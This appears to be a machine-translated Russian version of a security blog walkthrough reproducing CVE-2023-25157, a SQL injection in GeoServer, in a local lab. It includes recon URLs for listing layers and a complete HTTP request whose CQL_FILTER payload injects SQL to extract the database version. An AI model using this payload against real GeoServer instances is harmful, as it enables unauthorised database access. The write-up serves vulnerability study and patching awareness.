Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: lyc@Timeline Sec Количество слов в этой статье: 1296. Время чтения: 2~4 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.
GeoServer — это J2EE-реализация спецификации веб-сервера OpenGIS. GeoServer можно использовать для простой публикации картографических данных и предоставления пользователям возможности обновлять, удалять и вставлять данные объектов. GeoServer может быстро и легко обмениваться пространственной географической информацией между пользователями.
Номер уязвимости: CVE-2023-25157. В версиях до 2.22.1 и 2.21.4 была обнаружена проблема внедрения SQL в выражениях фильтров и функций, определенных стандартом Открытого геопространственного консорциума (OGC), которая могла позволить злоумышленнику, не прошедшему проверку подлинности, использовать уязвимость для выполнения SQL-инъекции и выполнения вредоносных программ. код.
geoserver<2.18.7 2.19.0<=geoserver<2.19.7 2.20.0<=geoserver<2.20.7 2.21.0<=geoserver<2.21.4 2.22.0<=geoserver<2.22.2
Среда настройки GeoServer имеет множество опций. Загрузите версию для Windows здесь.
Ссылка для скачивания: https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download
После скачивания приступаем к установке
Перед установкой этой службы необходимо настроить среду Java, иначе следующий шаг установки среды будет невозможен.
Пароль учетной записи администратора службы следующий. Вы можете использовать пароль по умолчанию или изменить его самостоятельно.
По умолчанию здесь установлен порт 8080, который может конфликтовать. Вы можете изменить конфигурацию самостоятельно. Здесь установлен порт 9999.
После того как все установлено,GeoServerПуть установки по умолчанию следующий::C:\Program Files\GeoServer\bin
,Нажмитеstartup.bat
,запустить скрипт,После запуска скрипта,Не закрывайте cmd. просить.
Посетите следующий URL-адрес:http://localhost:9999/geoserver/web/
,Здесь указан порт 9999, поскольку в конфигурации выше он был 9999.,когда на самом деле посещаешь,Вам необходимо получить доступ в соответствии с вашим собственным портом. И введите указанный выше пароль учетной записи: admin/geoserver.,Войдите в Геосервер
Войти успешно
Выполнение SQL-инъекции уязвимости До,Во-первых, вам необходимо получить информацию о списке географических слоев.,Эта информация является обязательным параметром в полезных данных внедрения SQL.
Доступ по следующему пути для получения информации о списке географических слоев.
http://192.168.254.170:9999/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities
<Name>
информация на этикетках,Это список географических слоев。Выбирайте здесьne:populated_places
В качестве информации о списке географических слоев
Затем перейдите по следующему пути, чтобы получить имя атрибута слоя.
http://192.168.254.170:9999/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:populated_places&maxFeatures=1&outputFormat=json
Окончательная полезная нагрузка выглядит следующим образом:
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
Host: 192.168.254.170:9999
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1p6q6kkghu4bg1x04chtdvm369
Connection: close
Запрос информации о версии базы данных
Последняя версия была официально выпущена, и вы можете загрузить и обновить ее до последней версии.